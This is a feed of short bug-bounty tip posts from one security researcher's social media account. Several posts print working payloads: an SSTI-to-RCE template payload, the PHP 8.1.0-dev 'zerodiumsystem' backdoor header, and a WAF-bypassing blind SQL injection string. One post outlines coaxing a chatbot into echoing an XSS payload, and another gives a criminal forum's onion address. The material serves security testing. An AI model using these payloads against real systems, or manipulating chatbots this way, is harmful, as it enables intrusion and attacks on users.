Ismail @Ismailpy_Crypto
Tanger - Tétouan, Royaume du M | Joined August 2021
Tweets: 269 | Followers: 30 | Following: 334 | Likes: 46
🧠 SSTI → Remote Code Execution 1️⃣ App renders user input in template engine 2️⃣ Attacker sends payload: {{7*7}} 3️⃣ Output: 49 → confirms injection 4️⃣ Escalates to: {{self._globals.os.popen('id').read()}} 🎯 Full RCE via template context #bugbounty #ssti #rce #infosec
If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli #cybersecurity
10 common JavaScript coding vulnerabilities Practical code examples.🐞💻 1- Open Redirect 2-SSRF 3-Timing Attacks 4-prototype pollution 5-NoSQLi 6-ReDoS 7-misconfiguration 8-Hard Code Vulnerability 9-mass assignment 10-Host Header Injection #BugBountyTip youtube.com/watch?v=ypNKKY…
Define the depth of your crawl with katana's -d flag. The higher the depth, the more recursive crawls and juicy data you get! 🤤 ⚠️ Higher depths can lead to long crawl times against large web applications.
💉 Complete Guide: The SQL Injection Knowledge Base Website: websec.ca/kb/sql_injecti… author: Roberto Salgado #infosec
JShunter JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug…
Someone made a subdomains database containing 1.6 billion subdomains scraped from multiple public (and private) sources. This database is now public and FREE and can be queried on the following website. - dash.pugrecon.celes.in #infosec #cybersec #bugbountytips
My New tool s3 ✅ github.com/KingOfBugbount… #bugbounty #bugbountytips #tools #ofjaaah
Misconfig Mapper: A fast tool to help you uncover security misconfigurations on popular third-party services used by your company and/or bug bounty targets GitHub: github.com/intigriti/misc…
I just published a new writeup about Authentication Bypass vulnerability on coinmarketcap. 0xbartita.medium.com/how-i-found-an… #bugbountytips #bugbountytip
Insecure Direct Object Reference (IDOR) Checklist credit : @elsec #bugbounty #bugbountytips #bughunting #penetrationtesting #pentesting #pentest #ethicalhacking #hacking #cybersecuritytips #cybersecurity #informationsecurity #infosec #bugcrowd #bugbountytips #bugbounty
Find the origin servers of websites protected by Cloudflare, Sucuri, or Incapsula with a misconfigured DNS. ⚔️ - github.com/MrH0wl/Cloudma… Credit: @0x0SojalSec #infosec #bugbountytips #Cybersecurity
Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param
🚨 New Writeup Alert! 🚨 "I Automated CSP Extraction and Mapped 100+ Subdomains" by Ibtissam hammadi is now live on IW! Check it out here: infosecwriteups.com/adf04880ea5d #cybersecurity #infosec #csp #reconnaissance #bugbounty
BreachForums has possibly returned at their original Onion address with what looks like its original data. I verified the Canary with the PGP and it is valid. http://breached26tezcofqla4adzyn22notfqwcac7gpbrleg4usehljwkgqd[.]onion
Looks interesting, will try it today 🤗
Day 144 - Bug Bounty - Went today deep in authentication flows - Learned a lot about different edge cases using different encoding/null bytes - Found this repo, which constantly updates the best ATO H1 reports: github.com/reddelexc/hack… Total earned so far: $5425
⚙️ With @profundisio , you can quickly check DNS records, subdomains, hosts, and their historical data right from your browser. It also offers real-time alerts and a variety of tools to help you keep track of changes and gather information efficiently ! 🔥 give it a try…
Hi All, Published my writeup on "XSS Filter Bypass". I was able to bypass the fix multiple times and learned a lot from this. Read it here: medium.com/@xploiterr/bre… #BugBounty #xss
